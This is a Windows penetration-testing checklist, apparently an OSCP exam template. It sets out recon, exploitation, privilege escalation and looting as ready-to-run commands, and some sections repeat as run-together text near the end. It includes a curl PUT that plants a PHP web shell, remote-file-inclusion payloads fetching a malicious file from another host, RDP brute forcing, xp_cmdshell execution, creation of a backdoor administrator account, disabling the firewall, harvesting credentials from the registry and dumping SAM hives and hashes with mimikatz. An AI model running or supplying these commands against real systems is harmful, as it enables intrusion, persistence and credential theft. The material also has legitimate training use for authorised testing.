Windows

https://github.com/xapax/oscp/blob/master/templates/windows-template.md

Info-sheet

DNS-Domain name:
Host name:
OS:
Server:
Workgroup:
Windows domain:
Services and ports:

Recon

Always start with a stealthy scan to avoid closing ports.

# Syn-scan
nmap -sS INSERTIPADDRESS

# Service-version, default scripts, OS:
nmap INSERTIPADDRESS -sV -sC -O

# Scan all ports, might take a while.
nmap INSERTIPADDRESS -p-

# Scan for UDP
nmap INSERTIPADDRESS -sU
unicornscan -mU -v -I INSERTIPADDRESS

# Connect to udp if one is open
nc -u INSERTIPADDRESS 48772

# Monster scan
nmap INSERTIPADDRESS -p- -A -T4 -sC

Port 21 - FTP

Name:
Version:
Anonymous login:

nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 INSERTIPADDRESS

Port 22 - SSH

Name:
Version:
Protocol:
RSA-key-fingerprint:
Takes-password:
If you have usernames test login with username:username

Port 25

Name:
Version:
VRFY:
EXPN:

nc -nvv INSERTIPADDRESS 25
HELO foo<cr><lf>

nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 INSERTIPADDRESS

Port 110 - Pop3

Name:
Version:

Port 135 - MSRPC

Some versions are vulnerable.

nmap INSERTIPADDRESS --script=msrpc-enum

Exploit:

msf > use exploit/windows/dcerpc/ms03_026_dcom

Port 139/445 - SMB

Name:
Version:
Domain/workgroup name:
Domain-sid:
Allows unauthenticated login:

nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse INSERTIPADDRESS -p 445

enum4linux -a INSERTIPADDRESS

rpcclient -U "" INSERTIPADDRESS
    srvinfo
    enumdomusers
    getdompwinfo
    querydominfo
    netshareenum
    netshareenumall

smbclient -L INSERTIPADDRESS
smbclient //INSERTIPADDRESS/tmp
smbclient \\\\INSERTIPADDRESS\\ipc$ -U john
smbclient //INSERTIPADDRESS/ipc$ -U john
smbclient //INSERTIPADDRESS/admin$ -U john

Log in with shell:
winexe -U username //INSERTIPADDRESS "cmd.exe" --system

Port 161/162 UDP - SNMP

nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes INSERTIPADDRESS
snmp-check -t INSERTIPADDRESS -c public

# Common community strings
public
private
community

Port 554 - RTSP

Port 1030/1032/1033/1038

Used by RPC to connect in domain network. Usually nothing.

Port 1433 - MSSQL

Version:

use auxiliary/scanner/mssql/mssql_ping

# Last options. Brute force.
scanner/mssql/mssql_login

# Log in to mssql
sqsh -S INSERTIPADDRESS -U sa

# Execute commands
xp_cmdshell 'date'
go

If you have credentials look in metasploit for other modules.

Port 1521 - Oracle

Name: Version: Password protected:

tnscmd10g version -h INSERTIPADDRESS
tnscmd10g status -h INSERTIPADDRESS

Port 2100 - Oracle XML DB

Name:
Version:

Default logins:

sys:sys
scott:tiger

Port 2049 - NFS

showmount -e INSERTIPADDRESS

If you find anything you can mount it like this:

mount INSERTIPADDRESS:/ /tmp/NFS
mount -t INSERTIPADDRESS:/ /tmp/NFS

3306 - MySQL

Name:
Version:

mysql --host=INSERTIPADDRESS -u root -p

nmap -sV -Pn -vv -script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 INSERTIPADDRESS -p 3306

Port 3339 - Oracle web interface

Basic info about web service (apache, nginx, IIS)
Server:
Scripting language:
Apache Modules:
IP-address:
Domain-name address:

Port 3389 - Remote desktop

Test logging in to see what OS is running

rdesktop -u guest -p guest INSERTIPADDRESS -g 94%

# Brute force
ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://INSERTIPADDRESS

Port 80

Server:
Scripting language:
Apache Modules:
Domain-name address:

INSERTCURLHEADER

Web application
Name:
Version:

# Nikto
nikto -h http://INSERTIPADDRESS

# Nikto with squid proxy
nikto -h INSERTIPADDRESS -useproxy http://INSERTIPADDRESS:4444

# Get header
curl -i INSERTIPADDRESS

# Get everything
curl -i -L INSERTIPADDRESS

# Check if it is possible to upload using put
curl -v -X OPTIONS http://INSERTIPADDRESS/
curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://INSERTIPADDRESS/test/shell.php

# Check for title and all links
dotdotpwn.pl -m http -h INSERTIPADDRESS -M GET -o unix

Nikto scan

INSERTNIKTOSCAN

Url brute force

# Dirb
dirb http://INSERTIPADDRESS -r -o dirb-INSERTIPADDRESS.txt

# Gobuster - remove relevant responde codes (403 for example)
gobuster -u http://INSERTIPADDRESS -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e

INSERTDIRBSCAN

Default/Weak login

Google documentation for default passwords and test them:

site:webapplication.com password

admin admin
admin password
admin <blank>
admin nameofservice
root root
root admin
root password
root nameofservice
<username if you have> password
<username if you have> admin
<username if you have> username
<username if you have> nameofservice

LFI/RFI

# Kadimus
/root/Tools/Kadimus/kadimus -u http://INSERTIPADDRESS/example.php?page=


# Bypass execution
http://INSERTIPADDRESS/index.php?page=php://filter/convert.base64-encode/resource=index
base64 -d savefile.php

# Bypass extension
http://INSERTIPADDRESS/page=http://192.168.1.101/maliciousfile.txt%00
http://INSERTIPADDRESS/page=http://192.168.1.101/maliciousfile.txt?

SQL-Injection

# Post
./sqlmap.py -r search-test.txt -p tfUPass

# Get
sqlmap -u "http://INSERTIPADDRESS/index.php?id=1" --dbms=mysql

# Crawl
sqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3

Sql-login-bypass

Open Burp-suite
Make and intercept request
Send to intruder
Cluster attack
Attack
Check for response length variation

Password brute force - last resort

cewl

Port 443 - HTTPS

Heartbleed:

sslscan INSERTIPADDRESS:443

Vulnerability analysis

Now we have gathered information about the system. Now comes the part where we look for exploits and vulnerabilities and features.

To try - List of possibilities

Add possible exploits here:

Find sploits - Searchsploit and google

Where there are many exploits for a software, use google. It will automatically sort it by popularity.

site:exploit-db.com apache 2.4.7

# Remove dos-exploits

searchsploit Apache 2.4.7 | grep -v '/dos/'
searchsploit Apache | grep -v '/dos/' | grep -vi "tomcat"

# Only search the title (exclude the path), add the -t
searchsploit -t Apache | grep -v '/dos/'

'''''''''''''''''''''''''''''''''' PRIVESC '''''''''''''''''''''''''''''''''

Privilege escalation

Now we start the whole enumeration-process over gain. This is a checklist. You need to check of every single one, in this order.

Kernel exploits
Cleartext password
Reconfigure service parameters
Inside service
Program running as root
Installed software
Scheduled tasks
Weak passwords

To-try list

Here you will add all possible leads. What to try.

Basic info

OS:
Version:
Architecture:
Current user:
Hotfixes:
Antivirus:

Users:

Localgroups:

systeminfo
set
hostname
net users
net user user1
net localgroups
accesschk.exe -uwcqv "Authenticated Users" *

netsh firewall show state
netsh firewall show config

# Set path
set PATH=%PATH%;C:\xampp\php

Kernel exploits

# Look for hotfixes
systeminfo

wmic qfe get Caption,Description,HotFixID,InstalledOn

# Search for exploits
site:exploit-db.com windows XX XX

Cleartext passwords

# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"

# SNMP Parameters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Reconfigure service parameters

Unquoted service paths

Check book for instructions

Weak service permissions

Check book for instructions

Inside service

Check netstat to see what ports are open from outside and from inside. Look for ports only available on the inside.

# Meterpreter
run get_local_subnets

netstat /a
netstat -ano

Programs running as root/system

Installed software

# Metasploit
ps

tasklist /SVC
net start
reg query HKEY_LOCAL_MACHINE\SOFTWARE
DRIVERQUERY

Look in:
C:\Program files
C:\Program files (x86)
Home directory of the user

Scheduled tasks

schtasks /query /fo LIST /v

Check this file:
c:\WINDOWS\SchedLgU.Txt

Weak passwords

Remote desktop

ncrack -vv --user george -P /root/oscp/passwords.txt rdp://INSERTIPADDRESS

Useful commands

Add user and enable RDP

net user haxxor Haxxor123 /add
net localgroup Administrators haxxor /add
net localgroup "Remote Desktop Users" haxxor /ADD

# Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Turn firewall off
netsh firewall set opmode disable

Or like this
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

If you get this error:

"ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ?
Failed to connect, CredSSP required by server.""

Add this reg key:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

----------------------------- LOOT LOOT LOOT LOOT -------------------

Loot

Proof:
Network secret:
Password and hashes:
Dualhomed:
Tcpdump:
Interesting files:
Databases:
SSH-keys:
Browser:

Proof

Network secret

Passwords and hashes

wce32.exe -w
wce64.exe -w
fgdump.exe

reg.exe save hklm\sam c:\sam_backup
reg.exe save hklm\security c:\security_backup
reg.exe save hklm\system c:\system

# Meterpreter
hashdump
load mimikatz
msv

Dualhomed

ipconfig /all
route print

# What other machines have been connected
arp -a

Tcpdump

# Meterpreter
run packetrecorder -li
run packetrecorder -i 1

Interesting files

#Meterpreter
search -f *.txt
search -f *.zip
search -f *.doc
search -f *.xls
search -f config*
search -f *.rar
search -f *.docx
search -f *.sql

# How to cat files in meterpreter
cat c:\\Inetpub\\iissamples\\sdk\\asp\\components\\adrot.txt

# Recursive search
dir /s

Mail

Browser

Browser start-page:
Browser-history:
Saved passwords:

Databases

SSH-keys

How to replicate:

Last updated 5 years ago

Was this helpful?

Always start with a stealthy scan to avoid closing ports. # Syn-scan nmap -sS INSERTIPADDRESS # Service-version, default scripts, OS: nmap INSERTIPADDRESS -sV -sC -O # Scan all ports, might take a while. nmap INSERTIPADDRESS -p- # Scan for UDP nmap INSERTIPADDRESS -sU unicornscan -mU -v -I INSERTIPADDRESS # Connect to udp if one is open nc -u INSERTIPADDRESS 48772 # Monster scan nmap INSERTIPADDRESS -p- -A -T4 -sC

nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse INSERTIPADDRESS -p 445 enum4linux -a INSERTIPADDRESS rpcclient -U "" INSERTIPADDRESS srvinfo enumdomusers getdompwinfo querydominfo netshareenum netshareenumall smbclient -L INSERTIPADDRESS smbclient //INSERTIPADDRESS/tmp smbclient \\\\INSERTIPADDRESS\\ipc$ -U john smbclient //INSERTIPADDRESS/ipc$ -U john smbclient //INSERTIPADDRESS/admin$ -U john Log in with shell: winexe -U username //INSERTIPADDRESS "cmd.exe" --system

mysql --host=INSERTIPADDRESS -u root -p nmap -sV -Pn -vv -script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 INSERTIPADDRESS -p 3306

# Nikto nikto -h http://INSERTIPADDRESS # Nikto with squid proxy nikto -h INSERTIPADDRESS -useproxy http://INSERTIPADDRESS:4444 # Get header curl -i INSERTIPADDRESS # Get everything curl -i -L INSERTIPADDRESS # Check if it is possible to upload using put curl -v -X OPTIONS http://INSERTIPADDRESS/ curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://INSERTIPADDRESS/test/shell.php # Check for title and all links dotdotpwn.pl -m http -h INSERTIPADDRESS -M GET -o unix

# Dirb dirb http://INSERTIPADDRESS -r -o dirb-INSERTIPADDRESS.txt # Gobuster - remove relevant responde codes (403 for example) gobuster -u http://INSERTIPADDRESS -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e

admin admin admin password admin <blank> admin nameofservice root root root admin root password root nameofservice <username if you have> password <username if you have> admin <username if you have> username <username if you have> nameofservice

# Kadimus /root/Tools/Kadimus/kadimus -u http://INSERTIPADDRESS/example.php?page= # Bypass execution http://INSERTIPADDRESS/index.php?page=php://filter/convert.base64-encode/resource=index base64 -d savefile.php # Bypass extension http://INSERTIPADDRESS/page=http://192.168.1.101/maliciousfile.txt%00 http://INSERTIPADDRESS/page=http://192.168.1.101/maliciousfile.txt?

site:exploit-db.com apache 2.4.7 # Remove dos-exploits searchsploit Apache 2.4.7 | grep -v '/dos/' searchsploit Apache | grep -v '/dos/' | grep -vi "tomcat" # Only search the title (exclude the path), add the -t searchsploit -t Apache | grep -v '/dos/'

systeminfo set hostname net users net user user1 net localgroups accesschk.exe -uwcqv "Authenticated Users" * netsh firewall show state netsh firewall show config # Set path set PATH=%PATH%;C:\xampp\php

# Windows autologin reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # VNC reg query "HKCU\Software\ORL\WinVNC3\Password" # SNMP Parameters reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # Putty reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Search for password in registry reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s

net user haxxor Haxxor123 /add net localgroup Administrators haxxor /add net localgroup "Remote Desktop Users" haxxor /ADD # Enable RDP reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f Turn firewall off netsh firewall set opmode disable Or like this reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f If you get this error: "ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ? Failed to connect, CredSSP required by server."" Add this reg key: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

#Meterpreter search -f *.txt search -f *.zip search -f *.doc search -f *.xls search -f config* search -f *.rar search -f *.docx search -f *.sql # How to cat files in meterpreter cat c:\\Inetpub\\iissamples\\sdk\\asp\\components\\adrot.txt # Recursive search dir /s